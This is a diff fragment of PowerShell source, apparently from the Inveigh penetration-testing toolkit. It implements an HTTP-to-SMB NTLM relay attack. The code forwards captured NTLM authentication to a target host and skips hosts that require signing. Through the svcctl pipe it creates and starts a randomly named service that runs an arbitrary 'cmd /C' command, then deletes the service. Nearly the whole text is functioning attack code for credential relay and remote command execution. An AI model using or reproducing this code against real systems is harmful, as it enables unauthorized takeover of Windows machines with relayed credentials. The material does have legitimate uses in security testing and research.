+ $SMB_client_stage = 'NegotiateSMB'
+
+ :SMB_relay_challenge_loop while($SMB_client_stage -ne 'exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'NegotiateSMB'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
+ $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_challenge_stream.Flush()
+ $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB_version = 'SMB1'
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+ else
+ {
+ $SMB_client_stage = 'NegotiateSMB2'
+ }
+
+ if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03'))
+ {
+ $inveigh.target_list.Remove($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed target $($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString) due to signing requirement")
+ $SMB_relay_socket.Close()
+ $SMB_client_receive = $null # ?
+ $SMB_client_stage = 'exit'
+ }
+ elseif($signing_check)
+ {
+ $SMB_relay_socket.Close()
+ $SMB_client_stage = 'exit'
+ }
+
+ }
+
+ 'NegotiateSMB2'
+ {
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2_message_ID = 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_challenge_stream.Flush()
+ $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+
+ 'NTLMSSPNegotiate'
+ {
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB_data = New-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ }
+ else
+ {
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ }
+
+ $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_challenge_stream.Flush()
+ $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'exit'
+ }
+
+ }
+
+ }
+
+ return $SMB_client_receive
+ }
+
+ function SMBRelayResponse
+ {
+ param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID)
+
+ $SMB_client_receive = New-Object System.Byte[] 1024
+
+ if($SMB_relay_socket)
+ {
+ $SMB_relay_response_stream = $SMB_relay_socket.GetStream()
+ }
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header["UserID"] = $SMB_user_ID
+ $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB_data = New-PacketSMBSessionSetupAndXRequest $NTLMSSP_auth
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ }
+ else
+ {
+ $SMB2_message_ID = 3
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_auth
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ }
+
+ $SMB_relay_response_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_response_stream.Flush()
+ $SMB_relay_response_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00'))
+ {
+ $SMB_relay_failed = $false
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay authentication successful for $HTTP_username_full on $Target") > $null
+ }
+ else
+ {
+
+ if($HTTP_NTLM_domain_string -ne '')
+ {
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ }
+
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ $SMB_relay_failed = $true
+ $SMB_relay_socket.Close()
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay authentication failed for $HTTP_username_full on $Target") > $null
+ }
+
+ return $SMB_relay_failed
+ }
+
+ function SMBRelayExecute
+ {
+ param ($SMB_relay_socket,$SMB_version,$SMB_user_ID,$SMB_session_ID)
+
+ $SMB_client_receive = New-Object System.Byte[] 1024
+
+ if(!$Service)
+ {
+ $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
+ $SMB_service = $SMB_service_random -replace "-00",""
+ $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
+ $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
+ $SMB_service_random += '00-00-00-00-00'
+ $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $SMB_service = $Service
+ $SMB_service_bytes = [System.Text.Encoding]::Unicode.GetBytes($Service)
+
+ if([Bool]($SMB_service.Length % 2))
+ {
+ $SMB_service_bytes += 0x00,0x00
+ }
+ else
+ {
+ $SMB_service_bytes += 0x00,0x00,0x00,0x00
+
+ }
+
+ }
+
+ $SMB_service_length = [System.BitConverter]::GetBytes($SMB_service.Length + 1)
+ $Command = "%COMSPEC% /C `"" + $Command + "`""
+ [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{$SMBExec_command += "{0:X2}-00-" -f $_}
+
+ if([Bool]($Command.Length % 2))
+ {
+ $SMBExec_command += '00-00'
+ }
+ else
+ {
+ $SMBExec_command += '00-00-00-00'
+ }
+
+ $SMBExec_command_bytes = $SMBExec_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMBExec_command_length_bytes = [System.BitConverter]::GetBytes($SMBExec_command_bytes.Length / 2)
+
+ $SMB_path = "\\" + $Target + "\IPC$"
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_path_bytes = [System.Text.Encoding]::UTF8.GetBytes($SMB_path) + 0x00
+ }
+ else
+ {
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
+ }
+
+ $SMB_named_pipe_UUID = 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03
+ $SMB_client_stream = $SMB_relay_socket.GetStream()
+ $SMB_split_index = 4256
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_client_stage = 'TreeConnectAndXRequest'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'Exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'TreeConnectAndXRequest'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBTreeConnectAndXRequest $SMB_path_bytes
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'CreateAndXRequest'
+ }
+
+ 'CreateAndXRequest'
+ {
+ $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl
+ $SMB_tree_ID = $SMB_client_receive[28,29]
+ $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'RPCBind'
+ }
+
+ 'RPCBind'
+ {
+ $SMB_FID = $SMB_client_receive[42,43]
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'OpenSCManagerW'
+ }
+
+ 'ReadAndXRequest'
+ {
+ Start-Sleep -m 150
+ $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBReadAndXRequest
+ $packet_SMB_data["FID"] = $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+
+ 'OpenSCManagerW'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'CheckAccess'
+ }
+
+ 'CheckAccess'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+ $SMB_service_manager_context_handle = $SMB_client_receive[88..107]
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has execution privilege on $Target") > $null
+
+ if($SCM_data.Length -lt $SMB_split_index)
+ {
+ $SMB_client_stage = 'CreateServiceW'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_First'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00')
+ {
+ $SMB_relay_failed = $true
+
+ if($HTTP_NTLM_domain_string -ne '')
+ {
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ }
+
+ if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target"))
+ {
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ }
+
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full does not have execution privilege on $Target") > $null
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'CreateServiceW'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'CreateServiceW_First'
+ {
+ $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
+ $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
+ $SMB_split_index_tracker = $SMB_split_index
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage_final -le 2)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_split_stage = 2
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Middle'
+ {
+ $SMB_split_stage++
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
+ $SMB_split_index_tracker += $SMB_split_index
+ $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage -ge $SMB_split_stage_final)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Last'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
+ $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service created on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute SMB relay command on $Target") > $null
+ $SMB_service_context_handle = $SMB_client_receive[92..111]
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'DeleteServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '31-04-00-00')
+ {
+ $SMB_relay_failed = $true
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service creation failed on $Target") > $null
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay command executed on $Target") > $null
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service failed to start on $Target") > $null
+ }
+
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
